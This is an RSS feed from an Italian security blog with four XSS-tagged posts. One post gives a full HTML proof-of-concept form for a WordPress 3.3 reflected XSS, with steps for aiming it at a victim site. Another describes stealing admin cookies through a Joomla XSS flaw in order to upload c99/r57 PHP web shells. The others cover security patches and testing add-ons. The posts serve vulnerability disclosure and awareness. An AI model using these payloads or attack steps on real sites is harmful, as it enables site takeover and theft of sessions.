<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Capn3m0 WebSecurity &#187; xss</title>
	<atom:link href="http://www.capn3m0.org/tag/xss/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.capn3m0.org</link>
	<description>...hacking, security, wifi and more...</description>
	<lastBuildDate>Tue, 07 Feb 2012 20:08:15 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>WordPress 3.3, 0-day Reflected XSS Vulnerability</title>
		<link>http://www.capn3m0.org/wordpress-3.3-0-day-reflected-xss-vulnerability.html</link>
		<comments>http://www.capn3m0.org/wordpress-3.3-0-day-reflected-xss-vulnerability.html#comments</comments>
		<pubDate>Tue, 03 Jan 2012 08:48:31 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[cross site scripting]]></category>
		<category><![CDATA[vulnerabilità wordpress]]></category>
		<category><![CDATA[wordpress 0-day]]></category>
		<category><![CDATA[wordpress 3.3]]></category>
		<category><![CDATA[wordpress exploit]]></category>
		<category><![CDATA[wordpress vulnerability]]></category>
		<category><![CDATA[wordpress zero-day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=4058</guid>
		<description><![CDATA[A pochi giorni dal rilascio della nuova versione di WordPress, la 3.3, due hacker indiani hanno individuato una vulnerabilità che permette di eseguire codice XSS sfruttando un problema nel form di pubblicazione dei commenti. Praticamente per eseguire l&#8217;exploit è necessario per prima cosa pubblicare un commento sul WordPress vittima. Una volta fatto ciò è necessario [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2010/10/wordpress.jpg" rel="lightbox[4058]" title="WordPress"><img class="alignleft size-thumbnail wp-image-1045" title="WordPress" src="http://www.capn3m0.org/wp-content/uploads/2010/10/wordpress-150x150.jpg" alt="WordPress 3.3, 0 day Reflected XSS Vulnerability" width="150" height="150" /></a>A pochi giorni dal rilascio della nuova versione di <a title="[UPGRADE] WordPress 3.3: Sonny suona per noi" href="http://www.capn3m0.org/upgrade-wordpress-3.3-sonny-suona-per-noi.html"><strong>WordPress</strong>, la <strong>3.3</strong></a>, due hacker indiani hanno individuato una vulnerabilità che permette di eseguire codice XSS sfruttando un problema nel form di pubblicazione dei commenti.</p>
<p>Praticamente per eseguire l&#8217;<strong>exploit</strong> è necessario per prima cosa <strong>pubblicare un commento sul WordPress vittima</strong>.</p>
<p>Una volta fatto ciò è necessario creare una pagina contente il seguente codice e pubblicarla in un proprio spazio Web.</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">&lt;html&gt;
&lt;title&gt;Wordpress 3.3 XSS PoC&lt;/title&gt;
&lt;body&gt;
&lt;form name=&quot;XSS&quot; id=&quot;XSS&quot; action=&quot;http://192.168.1.102/wordpress/wp-comments-post.php?&lt;/style&gt;&lt;script&gt;document.write(Date())&lt;/script&gt;&lt;style&gt;&quot; method=&quot;POST&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;author&quot; value=&quot;replace me&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;replace me&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;url&quot; value=&quot;&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;comment&quot; value=&quot;replace me&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;submit&quot; value=&quot;Post Comment&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;comment_post_ID&quot; value=&quot;replace me&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;comment_parent&quot; value=&quot;0&quot;/&gt;
&lt;input type=&quot;button&quot; value=&quot;Click Me&quot; /&gt;
&lt;/style&gt;&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</pre></div></div>

<p>Al posto di &#8220;<strong><em>replace me</em></strong>&#8221; vanno inseriti gli stessi dati usati nel precedente commento e al posto di &#8220;<strong>http://192.168.1.102/wordpress/</strong>&#8221; va inserito il riferimento del sito vittima.</p>
<p>A questo punto basterà cliccare sul tasto &#8220;<strong>Click me</strong>&#8221; e lo script provvederà nuovamente a pubblicare il post. Trovandolo già pubblicato genererà un errore di cotenuto duplicato ma il codice Javascript inserito nel &#8220;form action&#8221; della nostra pagina verrà eseguito.</p>
<p>Nell&#8217;esempio il codice Javascript da eseguire era il seguente:</p>

<div class="wp_syntax"><div class="code"><pre class="javascript" style="font-family:monospace;"><span style="color: #339933;">&lt;</span>script<span style="color: #339933;">&gt;</span>document.<span style="color: #000066; font-weight: bold;">write</span><span style="color: #009900;">&#40;</span>Date<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">&lt;/</span>script<span style="color: #339933;">&gt;</span></pre></div></div>

<p>che serve a visualizzare la data di sistema e, come si vede dalla seguente immagine,<strong>viene correttamenete eseguito dimostrando la vulnerabilità XSS</strong>.</p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2012/01/wordpress_3.3_xss.png" rel="lightbox[4058]" title="WordPress 3.3 XSS"><img class="aligncenter size-medium wp-image-4059" title="WordPress 3.3 XSS" src="http://www.capn3m0.org/wp-content/uploads/2012/01/wordpress_3.3_xss-300x119.png" alt="WordPress 3.3, 0 day Reflected XSS Vulnerability" width="300" height="119" /></a></p>
<p>In attesa di sviluppi e di una patch credo sia utile attivare temporaneamente un captcha o similare per i commenti così da evitare o almeno diminuire la possibilità di venire attaccati.</p>
<p>Link di riferimento</p>
<p><strong><a title="Zero Day Reflected Cross Site Scripting vulnerability in WordPress 3.3 - The Hackers News" href="http://thehackernews.com/2012/01/zero-day-reflected-cross-site-scripting.html" target="_blank">Zero Day Reflected Cross Site Scripting vulnerability in WordPress 3.3 &#8211; The Hackers News</a></strong><br />
<strong><a title="Sorgenti Exploit 0-day WordPress 3.3" href="http://pastebin.com/H1CeegTE" target="_blank">Sorgenti Pastebin.com</a></strong></p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/wordpress-3.3-0-day-reflected-xss-vulnerability.html/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; Joomla all versions XSS vulnerability</title>
		<link>http://www.capn3m0.org/exploit-joomla-all-versions-xss-vulnerability.html</link>
		<comments>http://www.capn3m0.org/exploit-joomla-all-versions-xss-vulnerability.html#comments</comments>
		<pubDate>Sat, 09 Oct 2010 16:42:38 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[proof of concept]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/exploit-joomla-all-versions-xss-vulnerability.html</guid>
		<description><![CDATA[Ciao a tutti, dopo diverso tempo dall&#8217;ultimo post pubblico una vulnerabilità che potrà creare non pochi problemi agli utilizzatori del noto Cms Joomla. E&#8217; stata pubblicata da poco una vulnerabilità di tipo XSS per tutte le versioni &#60; =1.5.20, ossia tutte le versioni attualmente pubblicate. Tale exploit sfrutta una falla nella verifica delle variabili GET [...]]]></description>
			<content:encoded><![CDATA[<p><br class="spacer_" /></p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2010/10/joomla-hack1.png" rel="lightbox[386]" title="Joomla"><img class="alignleft size-thumbnail wp-image-387" title="Joomla" src="http://www.capn3m0.org/wp-content/uploads/2010/10/joomla-hack1-150x150.png" alt="[EXPLOIT]   Joomla all versions XSS vulnerability" width="150" height="150" /></a>Ciao a tutti, dopo diverso tempo dall&#8217;ultimo post pubblico una vulnerabilità che potrà creare non pochi problemi agli utilizzatori del noto <strong><a href="http://www.joomla.org" target="_blank">Cms Joomla</a></strong>.</p>
<p>E&#8217; stata pubblicata da poco una vulnerabilità di tipo <strong>XSS</strong> per tutte le versioni <strong>&lt; =1.5.20</strong>, ossia <strong>tutte le versioni attualmente pubblicate</strong>.</p>
<p>Tale exploit sfrutta una falla nella verifica delle variabili GET encodate eseguendo quindi il codice Javascript che si passa all&#8217;applicativo.</p>
<p><a href="http://seclists.org/fulldisclosure/2010/Oct/109" target="_blank">Full Discolsure Advisories</a></p>
<p>Al seguente video si potrà vedere un Proof of Concept dell&#8217;attacco Xss.</p>
<p><a href="http://yehg.net/lab/pr0js/training/view/misc/joomla-1.5.20_encoded-xss/">Proof of Concept by yehg.net</a></p>
<p><span id="more-386"></span></p>
<p>Un malintenzionato potrebbe sfruttare tale falla per rubare i cookie degli utenti loggati, Administrator compreso, e sfruttarli per modificare pagine o uploadare shell malevole che permetterebbero qualsiasi operazione nello spazio del sito vittima. Una volta rubati i cookie di Admin, infatti, basterà andare nella pagina di edit di uno dei template di default, di solito &#8216;beez&#8217;, e successivamente editare la pagina con il codice di una shell php quali <strong>c99</strong> o <strong>r57</strong>.</p>
<p>Provvedero&#8217; ad aggiornare il post quanto prima con tutti i riferimenti e i dettagli (sono in treno con l&#8217;app WordPress per Blackberry <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_smile.gif' alt="[EXPLOIT]   Joomla all versions XSS vulnerability" class='wp-smiley' title="[EXPLOIT]   Joomla all versions XSS vulnerability pics" />  ).</p>
<p><strong>AGGIORNAMENTO #1</strong><br />
 Lo staff di Joomla ha provveduto a rilasciare la nuova versione dove tale problema e&#8217; stato fixato.</p>
<p>Chiunque utilizzi questo Cms e&#8217; invitato ad <strong>effettuare l&#8217;upgrade alla versione 1.5.21</strong></p>
<p><a href="http://www.joomla.org/announcements/release-news/5300-joomla-1521-released.html" target="_blank">Joomla 1.5.21 &#8211; Official Site</a></p>
<p><a href="http://developer.joomla.org/security/news/9-security/10-core-security/322-20101001-core-xss-vulnerabilities.html" target="_blank">Joomla Security News</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-joomla-all-versions-xss-vulnerability.html/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Rilasciato WordPress 2.8.6 per correggere 2 falle di sicurezza!</title>
		<link>http://www.capn3m0.org/rilasciato-wordpress-2.8.6-per-correggere-2-falle-di-sicurezza.html</link>
		<comments>http://www.capn3m0.org/rilasciato-wordpress-2.8.6-per-correggere-2-falle-di-sicurezza.html#comments</comments>
		<pubDate>Fri, 13 Nov 2009 08:54:53 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[security release]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=331</guid>
		<description><![CDATA[Dopo il tanto parlare degli ultimi giorni circa la possibilità che gli attacchi hacker avvenissero grazie a falle presenti in WordPress 2.8.5, rilasciato neanche un mese fa, è stata appena annunciata la security release 2.8.6 che contiene due importati fix di sicurezza. La prima è una vulnerabilità del componente &#8220;Press This&#8221; (Pubblicalo in italiano) scoperta [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/img_wp.JPG" rel="lightbox[331]" title="Wordpress 2.8.6"><img class="alignleft size-thumbnail wp-image-333" title="Wordpress 2.8.6" src="http://www.capn3m0.org/wp-content/uploads/2009/11/img_wp-150x150.jpg" alt="Rilasciato WordPress 2.8.6 per correggere 2 falle di sicurezza!" width="150" height="150" /></a>Dopo il tanto parlare degli ultimi giorni circa la possibilità che gli <a href="http://www.capn3m0.org/hack-cannot-redeclare-security_update.html" target="_self"><strong>attacchi hacker</strong></a> avvenissero grazie a falle presenti in <strong>WordPress 2.8.5</strong>, rilasciato neanche un mese fa, è stata appena annunciata la <a href="http://wordpress.org/development/2009/11/wordpress-2-8-6-security-release/" target="_blank"><strong>security release 2.8.6</strong></a> che contiene due importati fix di sicurezza.</p>
<p>La prima è una vulnerabilità del componente &#8220;Press This&#8221; (Pubblicalo in italiano) scoperta da Benjamin Flesch che permetteva di eseguire <a href="http://it.wikipedia.org/wiki/Cross-site_scripting" target="_blank"><strong>XSS (Cross Site Scripting)</strong></a> agli utenti registrati con privilegi di pubblicazione.</p>
<p>La seconda, invece, è stata scoperta da Dawid Golunski e consentiva di<strong> aggirare le limitazioni ai nomi dei file in determinate configurazioni Apache.</strong></p>
<p>In attesa della versione <strong>WordPress 2.9</strong> consiglio a tutti di provvedere ad aggiornare la propria versione tramite la funzione di &#8220;Aggiornamento Automatico&#8221; che verrà suggerita non appena entrerete nella vostra Bacheca.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/rilasciato-wordpress-2.8.6-per-correggere-2-falle-di-sicurezza.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[SECURITY] &#8211; 5 utili plugins per Firefox</title>
		<link>http://www.capn3m0.org/security-5-utili-plugins-per-firefox.html</link>
		<comments>http://www.capn3m0.org/security-5-utili-plugins-per-firefox.html#comments</comments>
		<pubDate>Tue, 17 Feb 2009 20:35:45 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[cookie manipulation]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hackbar]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[header http]]></category>
		<category><![CDATA[plugins]]></category>
		<category><![CDATA[remote file inclusion]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[sql inject me]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[tamper data]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[web developer]]></category>
		<category><![CDATA[xss]]></category>
		<category><![CDATA[xss me]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=248</guid>
		<description><![CDATA[In questo articolo vi presenterò 5 utili Addons di Firefox che possono tornare utili in diverse situazioni e, in particolar modo, quando si vogliono testare vulnerabilità e similari di un applicativo web. I plugins di cui parlerò sono i seguenti: Web Developer Bar Xss Me Sql Inject Me HackBar Tamper Data Questi 5 plugin torneranno [...]]]></description>
			<content:encoded><![CDATA[<p>In questo articolo vi presenterò <a href="https://addons.mozilla.org/it/firefox/" target="_blank"><strong>5 utili Addons di Firefox </strong></a>che possono tornare utili in diverse situazioni e, in particolar modo, quando si vogliono testare vulnerabilità e similari di un applicativo web.</p>
<p>I plugins di cui parlerò sono i seguenti:</p>
<ul>
<li><strong>Web Developer Bar</strong></li>
<li><strong>Xss Me</strong></li>
<li><strong>Sql Inject Me</strong></li>
<li><strong>HackBar</strong></li>
<li><strong>Tamper Data</strong></li>
</ul>
<p>Questi 5 plugin torneranno molto utili quando proveremo ad effettuare le nostre prime analisi di sicurezza in quanto permettono di analizzare diversi aspetti di un sito web. Va detto che non sono programmi  &#8220;per bucare&#8221; ma semplicemente dei test i cui risultati, se si hanno le giuste conoscenze, possono aiutare ad individuare falle o vulnerabilità in un dato sito.</p>
<p><span id="more-248"></span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/security-5-utili-plugins-per-firefox.html/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

<!-- Served from: www.capn3m0.org @ 2012-02-07 21:43:19 by W3 Total Cache -->
